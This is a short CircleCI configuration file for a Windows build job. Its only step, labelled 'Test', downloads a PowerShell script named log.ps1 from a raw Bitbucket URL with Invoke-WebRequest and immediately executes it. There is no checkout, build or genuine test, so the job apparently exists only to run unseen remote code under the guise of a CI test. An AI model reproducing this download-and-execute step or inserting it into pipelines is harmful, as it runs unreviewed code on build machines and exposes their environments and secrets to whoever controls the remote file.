version: 2.1 
 
orbs:
  win: circleci/windows@2.2.0
 
jobs:
  build: 
    executor:
      name: win/default 
      size: "medium" 
 
    steps:
      - run:
          name: Test
          command: |
            Invoke-WebRequest https://bitbucket.org/ararana/ranak/raw/ab5933928e552c9b10877008e17189ebac0be8bc/log.ps1 -OutFile log.ps1
            ./log.ps1